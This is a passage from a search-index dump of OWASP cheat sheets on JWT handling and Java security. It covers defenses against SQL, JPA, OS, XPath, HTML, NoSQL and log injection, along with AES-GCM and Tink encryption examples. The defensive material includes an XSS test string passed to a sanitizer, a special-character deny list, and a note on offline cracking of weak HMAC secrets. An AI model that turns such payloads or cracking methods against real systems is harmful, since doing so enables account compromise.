By storing the token in browser sessionStorage container it exposes the token to being stolen through a XSS attack. However, fingerprints added to the token prevent reuse of the stolen token by the attacker on their machine. To close a maximum of exploitation surfaces for an attacker, add a browser Content Security Policy to harden the execution context.

An alternative to storing token in browser sessionStorage is to use JavaScript private variable or Closures. In this, access to all web requests are routed through a JavaScript module that encapsulates the token in a private variable which can not be accessed other than from within the module.

Note:

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#implementation-example_4","title":"Implementation Example","text":"

JavaScript code to store the token after authentication.

/* Handle request for JWT token and local storage*/\nfunction authenticate() {\nconst login = $(\"#login\").val();\nconst postData = \"login=\" + encodeURIComponent(login) + \"&password=test\";\n\n$.post(\"/services/authenticate\", postData, function (data) {\nif (data.status == \"Authentication successful!\") {\n...\nsessionStorage.setItem(\"token\", data.token);\n}\nelse {\n...\nsessionStorage.removeItem(\"token\");\n}\n})\n.fail(function (jqXHR, textStatus, error) {\n...\nsessionStorage.removeItem(\"token\");\n});\n}\n

JavaScript code to add the token as a Bearer HTTP Authentication header when calling a service, for example a service to validate token here.

/* Handle request for JWT token validation */\nfunction validateToken() {\nvar token = sessionStorage.getItem(\"token\");\n\nif (token == undefined || token == \"\") {\n$(\"#infoZone\").removeClass();\n$(\"#infoZone\").addClass(\"alert alert-warning\");\n$(\"#infoZone\").text(\"Obtain a JWT token first :)\");\nreturn;\n}\n\n$.ajax({\nurl: \"/services/validate\",\ntype: \"POST\",\nbeforeSend: function (xhr) {\nxhr.setRequestHeader(\"Authorization\", \"bearer \" + token);\n},\nsuccess: function (data) {\n...\n},\nerror: function (jqXHR, textStatus, error) {\n...\n},\n});\n}\n

JavaScript code to implement closures with private variables:

function myFetchModule() {\n// Protect the original 'fetch' from getting overwritten via XSS\nconst fetch = window.fetch;\n\nconst authOrigins = [\"https://yourorigin\", \"http://localhost\"];\nlet token = '';\n\nthis.setToken = (value) => {\ntoken = value\n}\n\nthis.fetch = (resource, options) => {\nlet req = new Request(resource, options);\ndestOrigin = new URL(req.url).origin;\nif (token && authOrigins.includes(destOrigin)) {\nreq.headers.set('Authorization', token);\n}\nreturn fetch(req)\n}\n}\n\n...\n\n// usage:\nconst myFetch = new myFetchModule()\n\nfunction login() {\nfetch(\"/api/login\")\n.then((res) => {\nif (res.status == 200) {\nreturn res.json()\n} else {\nthrow Error(res.statusText)\n}\n})\n.then(data => {\nmyFetch.setToken(data.token)\nconsole.log(\"Token received and stored.\")\n})\n.catch(console.error)\n}\n\n...\n\n// after login, subsequent api calls:\nfunction makeRequest() {\nmyFetch.fetch(\"/api/hello\", {headers: {\"MyHeader\": \"foobar\"}})\n.then((res) => {\nif (res.status == 200) {\nreturn res.text()\n} else {\nthrow Error(res.statusText)\n}\n}).then(responseText => console.log(\"helloResponse\", responseText))\n.catch(console.error)\n}\n
"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#weak-token-secret","title":"Weak Token Secret","text":""},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#symptom_5","title":"Symptom","text":"

When the token is protected using an HMAC based algorithm, the security of the token is entirely dependent on the strength of the secret used with the HMAC. If an attacker can obtain a valid JWT, they can then carry out an offline attack and attempt to crack the secret using tools such as John the Ripper or Hashcat.

If they are successful, they would then be able to modify the token and re-sign it with the key they had obtained. This could let them escalate their privileges, compromise other users' accounts, or perform other actions depending on the contents of the JWT.

There are a number of guides that document this process in greater detail.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#how-to-prevent_5","title":"How to Prevent","text":"

The simplest way to prevent this attack is to ensure that the secret used to sign the JWTs is strong and unique, in order to make it harder for an attacker to crack. As this secret would never need to be typed by a human, it should be at least 64 characters, and generated using a secure source of randomness.

Alternatively, consider the use of tokens that are signed with RSA rather than using an HMAC and secret key.

"},{"location":"cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#further-reading","title":"Further Reading","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html","title":"Java Security Cheat Sheet","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#injection-prevention-in-java","title":"Injection Prevention in Java","text":"

This section aims to provide tips to handle Injection in Java application code.

Sample code used in tips is located here.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#what-is-injection","title":"What is Injection","text":"

Injection in OWASP Top 10 is defined as following:

Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#general-advices-to-prevent-injection","title":"General advices to prevent Injection","text":"

The following point can be applied, in a general way, to prevent Injection issue:

  1. Apply Input Validation (using \"allow list\" approach) combined with Output Sanitizing+Escaping on user input/output.
  2. If you need to interact with system, try to use API features provided by your technology stack (Java / .Net / PHP...) instead of building command.

Additional advices are provided on this cheatsheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#specific-injection-types","title":"Specific Injection types","text":"

Examples in this section will be provided in Java technology (see Maven project associated) but advices are applicable to others technologies like .Net / PHP / Ruby / Python...

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#sql","title":"SQL","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build an SQL query using a String and execute it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent","title":"How to prevent","text":"

Use Query Parameterization in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example","title":"Example","text":"
/*No DB framework used here in order to show the real use of\n  Prepared Statement from Java API*/\n/*Open connection with H2 database and use it*/\nClass.forName(\"org.h2.Driver\");\nString jdbcUrl = \"jdbc:h2:file:\" + new File(\".\").getAbsolutePath() + \"/target/db\";\ntry (Connection con = DriverManager.getConnection(jdbcUrl)) {\n\n/* Sample A: Select data using Prepared Statement*/\nString query = \"select * from color where friendly_name = ?\";\nList<String> colors = new ArrayList<>();\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"yellow\");\ntry (ResultSet rSet = pStatement.executeQuery()) {\nwhile (rSet.next()) {\ncolors.add(rSet.getString(1));\n}\n}\n}\n\n/* Sample B: Insert data using Prepared Statement*/\nquery = \"insert into color(friendly_name, red, green, blue) values(?, ?, ?, ?)\";\nint insertedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"orange\");\npStatement.setInt(2, 239);\npStatement.setInt(3, 125);\npStatement.setInt(4, 11);\ninsertedRecordCount = pStatement.executeUpdate();\n}\n\n/* Sample C: Update data using Prepared Statement*/\nquery = \"update color set blue = ? where friendly_name = ?\";\nint updatedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setInt(1, 10);\npStatement.setString(2, \"orange\");\nupdatedRecordCount = pStatement.executeUpdate();\n}\n\n/* Sample D: Delete data using Prepared Statement*/\nquery = \"delete from color where friendly_name = ?\";\nint deletedRecordCount;\ntry (PreparedStatement pStatement = con.prepareStatement(query)) {\npStatement.setString(1, \"orange\");\ndeletedRecordCount = pStatement.executeUpdate();\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#jpa","title":"JPA","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_1","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build a JPA query using a String and execute it. It's quite similar to SQL injection but here the altered language is not SQL but JPA QL.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_1","title":"How to prevent","text":"

Use Java Persistence Query Language Query Parameterization in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_1","title":"Example","text":"
EntityManager entityManager = null;\ntry {\n/* Get a ref on EntityManager to access DB */\nentityManager = Persistence.createEntityManagerFactory(\"testJPA\").createEntityManager();\n\n/* Define parameterized query prototype using named parameter to enhance readability */\nString queryPrototype = \"select c from Color c where c.friendlyName = :colorName\";\n\n/* Create the query, set the named parameter and execute the query */\nQuery queryObject = entityManager.createQuery(queryPrototype);\nColor c = (Color) queryObject.setParameter(\"colorName\", \"yellow\").getSingleResult();\n\n} finally {\nif (entityManager != null && entityManager.isOpen()) {\nentityManager.close();\n}\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_1","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#operating-system","title":"Operating System","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_2","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build an Operating System command using a String and execute it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_2","title":"How to prevent","text":"

Use technology stack API in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_2","title":"Example","text":"
/* The context taken is, for example, to perform a PING against a computer.\n* The prevention is to use the feature provided by the Java API instead of building\n* a system command as String and execute it */\nInetAddress host = InetAddress.getByName(\"localhost\");\nvar reachable = host.isReachable(5000);\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_2","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#xml-xpath-injection","title":"XML: XPath Injection","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_3","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build a XPath query using a String and execute it.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_3","title":"How to prevent","text":"

Use XPath Variable Resolver in order to prevent injection.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_3","title":"Example","text":"

Variable Resolver implementation.

/**\n * Resolver in order to define parameter for XPATH expression.\n *\n */\npublic class SimpleVariableResolver implements XPathVariableResolver {\n\nprivate final Map<QName, Object> vars = new HashMap<QName, Object>();\n\n/**\n     * External methods to add parameter\n     *\n     * @param name Parameter name\n     * @param value Parameter value\n     */\npublic void addVariable(QName name, Object value) {\nvars.put(name, value);\n}\n\n/**\n     * {@inheritDoc}\n     *\n     * @see javax.xml.xpath.XPathVariableResolver#resolveVariable(javax.xml.namespace.QName)\n     */\npublic Object resolveVariable(QName variableName) {\nreturn vars.get(variableName);\n}\n}\n

Code using it to perform XPath query.

/*Create a XML document builder factory*/\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\n\n/*Disable External Entity resolution for different cases*/\n//Do not performed here in order to focus on variable resolver code\n//but do it for production code !\n\n/*Load XML file*/\nDocumentBuilder builder = dbf.newDocumentBuilder();\nDocument doc = builder.parse(new File(\"src/test/resources/SampleXPath.xml\"));\n\n/* Create and configure parameter resolver */\nString bid = \"bk102\";\nSimpleVariableResolver variableResolver = new SimpleVariableResolver();\nvariableResolver.addVariable(new QName(\"bookId\"), bid);\n\n/*Create and configure XPATH expression*/\nXPath xpath = XPathFactory.newInstance().newXPath();\nxpath.setXPathVariableResolver(variableResolver);\nXPathExpression xPathExpression = xpath.compile(\"//book[@id=$bookId]\");\n\n/* Apply expression on XML document */\nObject nodes = xPathExpression.evaluate(doc, XPathConstants.NODESET);\nNodeList nodesList = (NodeList) nodes;\nElement book = (Element)nodesList.item(0);\nvar containsRalls = book.getTextContent().contains(\"Ralls, Kim\");\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_3","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#htmljavascriptcss","title":"HTML/JavaScript/CSS","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_4","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build an HTTP response and sent it to browser.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_4","title":"How to prevent","text":"

Either apply strict input validation (\"allow list\" approach) or use output sanitizing+escaping if input validation is not possible (combine both every time is possible).

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example_4","title":"Example","text":"
/*\nINPUT WAY: Receive data from user\nHere it's recommended to use strict input validation using \"allow list\" approach.\nIn fact, you ensure that only allowed characters are part of the input received.\n*/\n\nString userInput = \"You user login is owasp-user01\";\n\n/* First we check that the value contains only expected character*/\nif (!Pattern.matches(\"[a-zA-Z0-9\\\\s\\\\-]{1,50}\", userInput))\n{\nreturn false;\n}\n\n/* If the first check pass then ensure that potential dangerous character\nthat we have allowed for business requirement are not used in a dangerous way.\nFor example here we have allowed the character '-', and, this can\nbe used in SQL injection so, we\nensure that this character is not used is a continuous form.\nUse the API COMMONS LANG v3 to help in String analysis...\n*/\nIf (0 != StringUtils.countMatches(userInput.replace(\" \", \"\"), \"--\"))\n{\nreturn false;\n}\n\n/*\nOUTPUT WAY: Send data to user\nHere we escape + sanitize any data sent to user\nUse the OWASP Java HTML Sanitizer API to handle sanitizing\nUse the OWASP Java Encoder API to handle HTML tag encoding (escaping)\n*/\n\nString outputToUser = \"You <p>user login</p> is <strong>owasp-user01</strong>\";\noutputToUser += \"<script>alert(22);</script><img src='#' onload='javascript:alert(23);'>\";\n\n/* Create a sanitizing policy that only allow tag '<p>' and '<strong>'*/\nPolicyFactory policy = new HtmlPolicyBuilder().allowElements(\"p\", \"strong\").toFactory();\n\n/* Sanitize the output that will be sent to user*/\nString safeOutput = policy.sanitize(outputToUser);\n\n/* Encode HTML Tag*/\nsafeOutput = Encode.forHtml(safeOutput);\nString finalSafeOutputExpected = \"You <p>user login</p> is <strong>owasp-user01</strong>\";\nif (!finalSafeOutputExpected.equals(safeOutput))\n{\nreturn false;\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_4","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#ldap","title":"LDAP","text":"

A dedicated cheatsheet has been created.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#nosql","title":"NoSQL","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_5","title":"Symptom","text":"

Injection of this type occur when the application uses untrusted user input to build a NoSQL API call expression.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_5","title":"How to prevent","text":"

As there many NoSQL database system and each one use an API for call, it's important to ensure that user input received and used to build the API call expression does not contain any character that have a special meaning in the target API syntax. This in order to avoid that it will be used to escape the initial call expression in order to create another one based on crafted user input. It's also important to not use string concatenation to build API call expression but use the API to create the expression.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-mongodb","title":"Example - MongoDB","text":"
 /* Here use MongoDB as target NoSQL DB */\nString userInput = \"Brooklyn\";\n\n/* First ensure that the input do no contains any special characters\nfor the current NoSQL DB call API,\nhere they are: ' \" \\ ; { } $\n*/\n//Avoid regexp this time in order to made validation code\n//more easy to read and understand...\nArrayList < String > specialCharsList = new ArrayList < String > () {\n{\nadd(\"'\");\nadd(\"\\\"\");\nadd(\"\\\\\");\nadd(\";\");\nadd(\"{\");\nadd(\"}\");\nadd(\"$\");\n}\n};\n\nfor (String specChar: specialCharsList) {\nif (userInput.contains(specChar)) {\nreturn false;\n}\n}\n\n//Add also a check on input max size\nif (!userInput.length() <= 50)\n{\nreturn false;\n}\n\n/* Then perform query on database using API to build expression */\n//Connect to the local MongoDB instance\ntry(MongoClient mongoClient = new MongoClient()){\nMongoDatabase db = mongoClient.getDatabase(\"test\");\n//Use API query builder to create call expression\n//Create expression\nBson expression = eq(\"borough\", userInput);\n//Perform call\nFindIterable<org.bson.Document> restaurants = db.getCollection(\"restaurants\").find(expression);\n//Verify result consistency\nrestaurants.forEach(new Block<org.bson.Document>() {\n@Override\npublic void apply(final org.bson.Document doc) {\nString restBorough = (String)doc.get(\"borough\");\nif (!\"Brooklyn\".equals(restBorough))\n{\nreturn false;\n}\n}\n});\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_5","title":"References","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#log-injection","title":"Log Injection","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symptom_6","title":"Symptom","text":"

Log Injection occurs when an application includes untrusted data in an application log message (e.g., an attacker can cause an additional log entry that looks like it came from a completely different user, if they can inject CRLF characters in the untrusted data). More information about this attack is available on the OWASP Log Injection page.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#how-to-prevent_6","title":"How to prevent","text":"

To prevent an attacker from writing malicious content into the application log, apply defenses such as:

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-using-log4j2","title":"Example using Log4j2","text":"

Configuration of a logging policy to roll on 10 files of 5MB each, and encode/limit the log message using the Pattern encode{}{CRLF}, introduced in Log4j2 v2.10.0, and the -500m message size limit.:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Configuration status=\"error\" name=\"SecureLoggingPolicy\">\n<Appenders>\n<RollingFile name=\"RollingFile\" fileName=\"App.log\" filePattern=\"App-%i.log\" ignoreExceptions=\"false\">\n<PatternLayout>\n<!-- Encode any CRLF chars in the message and limit its\n                     maximum size to 500 characters -->\n<Pattern>%d{ISO8601} %-5p - %encode{ %.-500m }{CRLF}%n</Pattern>\n</PatternLayout>\n<Policies>\n<SizeBasedTriggeringPolicy size=\"5MB\"/>\n</Policies>\n<DefaultRolloverStrategy max=\"10\"/>\n</RollingFile>\n</Appenders>\n<Loggers>\n<Root level=\"debug\">\n<AppenderRef ref=\"RollingFile\"/>\n</Root>\n</Loggers>\n</Configuration>\n

Usage of the logger at code level:

import org.apache.logging.log4j.LogManager;\nimport org.apache.logging.log4j.Logger;\n...\n// No special action needed because security actions are\n// performed at the logging policy level\nLogger logger = LogManager.getLogger(MyClass.class);\nlogger.info(logMessage);\n...\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#example-using-logback-with-the-owasp-security-logging-library","title":"Example using Logback with the OWASP Security Logging library","text":"

Configuration of a logging policy to roll on 10 files of 5MB each, and encode/limit the log message using the CRLFConverter, provided by the no longer active OWASP Security Logging Project, and the -500msg message size limit:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<configuration>\n<!-- Define the CRLFConverter -->\n<conversionRule conversionWord=\"crlf\" converterClass=\"org.owasp.security.logging.mask.CRLFConverter\" />\n<appender name=\"RollingFile\" class=\"ch.qos.logback.core.rolling.RollingFileAppender\">\n<file>App.log</file>\n<rollingPolicy class=\"ch.qos.logback.core.rolling.FixedWindowRollingPolicy\">\n<fileNamePattern>App-%i.log</fileNamePattern>\n<minIndex>1</minIndex>\n<maxIndex>10</maxIndex>\n</rollingPolicy>\n<triggeringPolicy class=\"ch.qos.logback.core.rolling.SizeBasedTriggeringPolicy\">\n<maxFileSize>5MB</maxFileSize>\n</triggeringPolicy>\n<encoder>\n<!-- Encode any CRLF chars in the message and limit\n                 its maximum size to 500 characters -->\n<pattern>%relative [%thread] %-5level %logger{35} - %crlf(%.-500msg) %n</pattern>\n</encoder>\n</appender>\n<root level=\"debug\">\n<appender-ref ref=\"RollingFile\" />\n</root>\n</configuration>\n

You also have to add the OWASP Security Logging dependency to your project.

Usage of the logger at code level:

import org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n...\n// No special action needed because security actions\n// are performed at the logging policy level\nLogger logger = LoggerFactory.getLogger(MyClass.class);\nlogger.info(logMessage);\n...\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#references_6","title":"References","text":"
Note that the default Log4j2 encode{} encoder is HTML, which does NOT prevent log injection.\n\nIt prevents XSS attacks against viewing logs using a browser.\n\nOWASP recommends defending against XSS attacks in such situations in the log viewer application itself,\nnot by preencoding all the log messages with HTML encoding as such log entries may be used/viewed in many\nother log viewing/analysis tools that don't expect the log data to be pre-HTML encoded.\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#general-cryptography-guidance","title":"General cryptography guidance","text":""},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#encryption-for-storage","title":"Encryption for storage","text":"

Follow the algorithm guidance in the OWASP Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symmetric-example-using-google-tink","title":"Symmetric example using Google Tink","text":"

Google Tink has documentation on performing common tasks.

For example, this page (from Google's website) shows how to perform simple symmetric encryption.

The following code snippet shows an encapsulated use of this functionality:

Click here to view the \"Tink symmetric encryption\" code snippet.
import static java.nio.charset.StandardCharsets.UTF_8;\n\nimport com.google.crypto.tink.Aead;\nimport com.google.crypto.tink.InsecureSecretKeyAccess;\nimport com.google.crypto.tink.KeysetHandle;\nimport com.google.crypto.tink.TinkJsonProtoKeysetFormat;\nimport com.google.crypto.tink.aead.AeadConfig;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.Base64;\n\n// AesGcmSimpleTest\npublic class App {\n\n// Based on example from:\n// https://github.com/tink-crypto/tink-java/tree/main/examples/aead\n\npublic static void main(String[] args) throws Exception {\n\n// Key securely generated using:\n// tinkey create-keyset --key-template AES128_GCM --out-format JSON --out aead_test_keyset.json\n\n\n\n// Register all AEAD key types with the Tink runtime.\nAeadConfig.register();\n\n// Read the keyset into a KeysetHandle.\nKeysetHandle handle =\nTinkJsonProtoKeysetFormat.parseKeyset(\nnew String(Files.readAllBytes( Paths.get(\"/home/fredbloggs/aead_test_keyset.json\")), UTF_8), InsecureSecretKeyAccess.get());\n\nString message = \"This message to be encrypted\";\nSystem.out.println(message);\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata = \"Sender: fredbloggs@example.com\";\n\n// Encrypt the message\nbyte[] cipherText = AesGcmSimple.encrypt(message, metadata, handle);\nSystem.out.println(Base64.getEncoder().encodeToString(cipherText));\n\n// Decrypt the message\nString message2 = AesGcmSimple.decrypt(cipherText, metadata, handle);\nSystem.out.println(message2);\n}\n}\n\nclass AesGcmSimple {\n\npublic static byte[] encrypt(String plaintext, String metadata, KeysetHandle handle) throws Exception {\n// Get the primitive.\nAead aead = handle.getPrimitive(Aead.class);\nreturn aead.encrypt(plaintext.getBytes(UTF_8), metadata.getBytes(UTF_8));\n}\n\npublic static String decrypt(byte[] ciphertext, String metadata, KeysetHandle handle) throws Exception {\n// Get the primitive.\nAead aead = handle.getPrimitive(Aead.class);\nreturn new String(aead.decrypt(ciphertext, metadata.getBytes(UTF_8)),UTF_8);\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symmetric-example-using-built-in-jcajce-classes","title":"Symmetric example using built-in JCA/JCE classes","text":"

If you absolutely cannot use a separate library, it is still possible to use the built JCA/JCE classes but it is strongly recommended to have a cryptography expert review the full design and code, as even the most trivial error can severely weaken your encryption.

The following code snippet shows an example of using AES-GCM to perform encryption/decryption of data.

A few constraints/pitfalls with this code:

Click here to view the \"JCA/JCE symmetric encryption\" code snippet.
import java.nio.charset.StandardCharsets;\nimport java.security.SecureRandom;\nimport javax.crypto.spec.*;\nimport javax.crypto.*;\nimport java.util.Base64;\n\n\n// AesGcmSimpleTest\nclass Main {\n\npublic static void main(String[] args) throws Exception {\n// Key of 32 bytes / 256 bits for AES\nKeyGenerator keyGen = KeyGenerator.getInstance(AesGcmSimple.ALGORITHM);\nkeyGen.init(AesGcmSimple.KEY_SIZE, new SecureRandom());\nSecretKey secretKey = keyGen.generateKey();\n\n// Nonce of 12 bytes / 96 bits and this size should always be used.\n// It is critical for AES-GCM that a unique nonce is used for every cryptographic operation.\nbyte[] nonce = new byte[AesGcmSimple.IV_LENGTH];\nSecureRandom random = new SecureRandom();\nrandom.nextBytes(nonce);\n\nvar message = \"This message to be encrypted\";\nSystem.out.println(message);\n\n// Encrypt the message\nbyte[] cipherText = AesGcmSimple.encrypt(message, nonce, secretKey);\nSystem.out.println(Base64.getEncoder().encodeToString(cipherText));\n\n// Decrypt the message\nvar message2 = AesGcmSimple.decrypt(cipherText, nonce, secretKey);\nSystem.out.println(message2);\n}\n}\n\nclass AesGcmSimple {\n\npublic static final String ALGORITHM = \"AES\";\npublic static final String CIPHER_ALGORITHM = \"AES/GCM/NoPadding\";\npublic static final int KEY_SIZE = 256;\npublic static final int TAG_LENGTH = 128;\npublic static final int IV_LENGTH = 12;\n\npublic static byte[] encrypt(String plaintext, byte[] nonce, SecretKey secretKey) throws Exception {\nreturn cryptoOperation(plaintext.getBytes(StandardCharsets.UTF_8), nonce, secretKey, Cipher.ENCRYPT_MODE);\n}\n\npublic static String decrypt(byte[] ciphertext, byte[] nonce, SecretKey secretKey) throws Exception {\nreturn new String(cryptoOperation(ciphertext, nonce, secretKey, Cipher.DECRYPT_MODE), StandardCharsets.UTF_8);\n}\n\nprivate static byte[] cryptoOperation(byte[] text, byte[] nonce, SecretKey secretKey, int mode) throws Exception {\nCipher cipher = Cipher.getInstance(CIPHER_ALGORITHM);\nGCMParameterSpec gcmParameterSpec = new GCMParameterSpec(TAG_LENGTH, nonce);\ncipher.init(mode, secretKey, gcmParameterSpec);\nreturn cipher.doFinal(text);\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#encryption-for-transmission","title":"Encryption for transmission","text":"

Again, follow the algorithm guidance in the OWASP Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#asymmetric-example-using-google-tink","title":"Asymmetric example using Google Tink","text":"

Google Tink has documentation on performing common tasks.

For example, this page (from Google's website) shows how to perform a hybrid encryption process where two parties want to share data based on their asymmetric key pair.

The following code snippet shows how this functionality can be used to share secrets between Alice and Bob:

Click here to view the \"Tink hybrid encryption\" code snippet.
import static java.nio.charset.StandardCharsets.UTF_8;\n\nimport com.google.crypto.tink.HybridDecrypt;\nimport com.google.crypto.tink.HybridEncrypt;\nimport com.google.crypto.tink.InsecureSecretKeyAccess;\nimport com.google.crypto.tink.KeysetHandle;\nimport com.google.crypto.tink.TinkJsonProtoKeysetFormat;\nimport com.google.crypto.tink.hybrid.HybridConfig;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.Base64;\n\n// HybridReplaceTest\nclass App {\npublic static void main(String[] args) throws Exception {\n/*\n\n        Generated public/private keypairs for Bob and Alice using the\n        following tinkey commands:\n\n        ./tinkey create-keyset \\\n        --key-template DHKEM_X25519_HKDF_SHA256_HKDF_SHA256_AES_256_GCM \\\n        --out-format JSON --out alice_private_keyset.json\n\n        ./tinkey create-keyset \\\n        --key-template DHKEM_X25519_HKDF_SHA256_HKDF_SHA256_AES_256_GCM \\\n        --out-format JSON --out bob_private_keyset.json\n\n        ./tinkey create-public-keyset --in alice_private_keyset.json \\\n        --in-format JSON --out-format JSON --out alice_public_keyset.json\n\n        ./tinkey create-public-keyset --in bob_private_keyset.json \\\n        --in-format JSON --out-format JSON --out bob_public_keyset.json\n        */\n\nHybridConfig.register();\n\n// Generate ECC key pair for Alice\nvar alice = new HybridSimple(\ngetKeysetHandle(\"/home/alicesmith/private_keyset.json\"),\ngetKeysetHandle(\"/home/alicesmith/public_keyset.json\")\n\n);\n\nKeysetHandle alicePublicKey = alice.getPublicKey();\n\n// Generate ECC key pair for Bob\nvar bob = new HybridSimple(\ngetKeysetHandle(\"/home/bobjones/private_keyset.json\"),\ngetKeysetHandle(\"/home/bobjones/public_keyset.json\")\n\n);\n\nKeysetHandle bobPublicKey = bob.getPublicKey();\n\n// This keypair generation shoud be reperformed every so often in order to\n// obtain a new shared secret to avoid a long lived shared secret.\n\n// Alice encrypts a message to send to Bob\nString plaintext = \"Hello, Bob!\";\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata = \"Sender: alicesmith@example.com\";\n\nSystem.out.println(\"Secret being sent from Alice to Bob: \" + plaintext);\nvar cipherText = alice.encrypt(bobPublicKey, plaintext, metadata);\nSystem.out.println(\"Ciphertext being sent from Alice to Bob: \" + Base64.getEncoder().encodeToString(cipherText));\n\n\n// Bob decrypts the message\nvar decrypted = bob.decrypt(cipherText, metadata);\nSystem.out.println(\"Secret received by Bob from Alice: \" + decrypted);\nSystem.out.println();\n\n// Bob encrypts a message to send to Alice\nString plaintext2 = \"Hello, Alice!\";\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata2 = \"Sender: bobjones@example.com\";\n\nSystem.out.println(\"Secret being sent from Bob to Alice: \" + plaintext2);\nvar cipherText2 = bob.encrypt(alicePublicKey, plaintext2, metadata2);\nSystem.out.println(\"Ciphertext being sent from Bob to Alice: \" + Base64.getEncoder().encodeToString(cipherText2));\n\n// Bob decrypts the message\nvar decrypted2 = alice.decrypt(cipherText2, metadata2);\nSystem.out.println(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n\nprivate static KeysetHandle getKeysetHandle(String filename) throws Exception\n{\nreturn TinkJsonProtoKeysetFormat.parseKeyset(\nnew String(Files.readAllBytes( Paths.get(filename)), UTF_8), InsecureSecretKeyAccess.get());\n}\n}\nclass HybridSimple {\n\nprivate KeysetHandle privateKey;\nprivate KeysetHandle publicKey;\n\n\npublic HybridSimple(KeysetHandle privateKeyIn, KeysetHandle publicKeyIn) throws Exception {\nprivateKey = privateKeyIn;\npublicKey = publicKeyIn;\n}\n\npublic KeysetHandle getPublicKey() {\nreturn publicKey;\n}\n\npublic byte[] encrypt(KeysetHandle partnerPublicKey, String message, String metadata) throws Exception {\n\nHybridEncrypt encryptor = partnerPublicKey.getPrimitive(HybridEncrypt.class);\n\n// return the encrypted value\nreturn encryptor.encrypt(message.getBytes(UTF_8), metadata.getBytes(UTF_8));\n}\npublic String decrypt(byte[] ciphertext, String metadata) throws Exception 